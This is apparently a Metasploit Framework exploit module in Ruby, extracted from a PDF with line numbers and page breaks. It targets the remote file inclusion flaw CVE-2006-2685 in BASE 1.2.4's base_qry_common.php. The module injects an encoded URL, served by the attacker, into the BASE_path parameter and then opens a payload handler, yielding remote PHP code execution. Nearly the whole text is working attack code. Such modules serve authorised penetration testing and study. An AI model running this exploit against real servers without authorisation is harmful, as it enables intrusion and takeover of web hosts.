1 ##
2 # This file is part of the Metasploit Framework and may be subject to
3 # redistribution and commercial restrictions. Please see the Metasploit
4 # Framework web site for more information on licensing and terms of use.
5 # http://metasploit.com/projects/Framework/
6 ##
7
8 require ’msf/core’
9
10 class Metasploit3 < Msf::Exploit::Remote
11
12
include Msf::Exploit::Remote::Tcp
13
include Msf::Exploit::Remote::HttpClient
14
include Msf::Exploit::Remote::HttpServer::PHPInclude
15
16
def initialize(info = {})
17
super(update_info(info,
18
’Name’ => ’BASE base_qry_common Remote File Include.’,
19
’Description’ => %q{
20
This module exploits a remote file inclusion vulnerability in
21
the base_qry_common.php file in BASE 1.2.4 and earlier.
22
},
23
’Author’ => [ ’MC’ ],
24
’License’ => MSF_LICENSE,
25
’Version’ => ’$Revision:$’,
26
’References’ =>
27
[
28
[ ’CVE’, ’2006−2685’ ],
29
[ ’BID’, ’18298’ ],
30
],
31
’Privileged’ => false,
32
’Payload’ =>
33
{
34
’DisableNops’ => true,
35
’Compat’ =>
36
{
37
’ConnectionType’ => ’find’,
38
},
39
’Space’ => 32768,
40
},
41
’Platform’ => ’php’,
42
’Arch’ => ARCH_PHP,
43
’Targets’ => [[ ’Automatic’, { }]],
44
’DisclosureDate’ => ’Jun 14 2008’,
45
’DefaultTarget’ => 0))
46
47
register_options(
48
[
49
OptString.new(’PHPURI’, [true, "The URI to request, with the include parameter changed to !URL!"
, "/base/base_qry_common.php?BASE_path=!URL!"]),
50
], self.class)
51
end
Page 1/2
BASE 1.2.4 base_qry_common.php Remote File Inclusion
MC
06/14/2008
52
53
def php_exploit
54
55
timeout = 0.01
56
uri = datastore[’PHPURI’].gsub(’!URL!’, Rex::Text.to_hex(php_include_url, "%"))
57
print_status("Trying uri #{uri}")
58
59
response = send_request_raw( {
60
’global’ => true,
61
’uri’ => uri,
62
},timeout)
63
64
if response and response.code != 200
65
print_error("Server returned non−200 status code (#{response.code})")
66
end
67
68
handler
69
end
70
71 end
Page 2/2
BASE 1.2.4 base_qry_common.php Remote F